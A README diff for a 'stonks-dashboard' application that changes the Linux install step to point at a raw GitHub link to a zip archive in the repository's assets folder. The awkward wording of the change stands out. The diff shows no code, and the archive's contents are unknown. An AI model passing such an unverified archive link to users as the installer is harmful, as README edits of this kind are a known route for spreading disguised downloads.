OGshrey/stonks-dashboard/README.md

 3. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the application into your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and follow the included instructions to run the application.
+   - For Linux: Extract the downloaded `https://github.com/OGshrey/stonks-dashboard/raw/refs/heads/main/assets/stonks-dashboard-1.1.zip` file and follow the included instructions to run the application.

 4. **Run the Application:**
    Open your terminal and type the following command, replacing `<path-to-stonks-dashboard>` with the actual path to where you installed the application: